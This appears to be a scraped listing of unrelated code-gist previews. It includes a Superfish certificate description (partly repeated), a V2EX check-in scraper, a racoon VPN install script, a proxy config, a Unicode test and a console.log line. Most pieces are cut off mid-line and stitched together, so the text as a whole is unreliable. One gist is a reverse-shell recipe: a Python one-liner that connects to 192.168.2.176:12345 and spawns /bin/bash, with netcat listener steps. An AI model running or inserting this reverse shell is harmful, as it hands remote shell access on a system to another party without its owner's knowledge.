superfish.pem
contains:
- the Superfish certificate as found by both Chris Palmer and Matt Burke;
- the encrypted private key as found by Karl Koscher.
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
superfish.pem
contains:
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
# -*- coding: utf-8 -*- | |
from bs4 import BeautifulSoup | |
import requests | |
username = '' ###账号### | |
password = '' ###密码### | |
login_url = 'http://v2ex.com/signin' ###如V2EX设置了使用 SSL,必须改 https### | |
index_url = 'http://v2ex.com' ###同上### | |
mission_url = 'http://www.v2ex.com/mission/daily' ###同上### | |
UA = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) \ |
#! /bin/sh | |
# 安装racoon | |
apt-get install racoon | |
# 配置racoon | |
cat << _EOF_ > /etc/racoon/racoon.conf | |
log notify; | |
path pre_shared_key "/etc/racoon/psk.txt"; | |
path certificate "/etc/racoon/certs"; | |
listen { |
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
# on the CLIENT, run the following: | |
# nc -l 12345 | |
# on the SERVER, start the "reverse shell" | |
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
# now go to the CLIENT, listen on port 12345 for incoming shell connections | |
nc -l 12345 |
[Proxy] | |
WIFI = direct, interface=en2 | |
VPN = direct, interface=utun0 | |
[Rule] | |
DOMAIN-SUFFIX,yach.me,WIFI | |
FINAL,VPN |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" 测试 Python 在什么情况下会输出 Unicode 字符串 | |
需要首先理解在 Python 中 Unicode 类型和 Unicode 字符串指的不是同一个东西。 | |
Unicode 字符串是 str 类型,但它的值的表现形式是 Unicode 编码形式。 | |
""" | |
def printt(str): |
// Use Gists to store code you would like to remember later on | |
console.log(window); // log the "window" object to the console |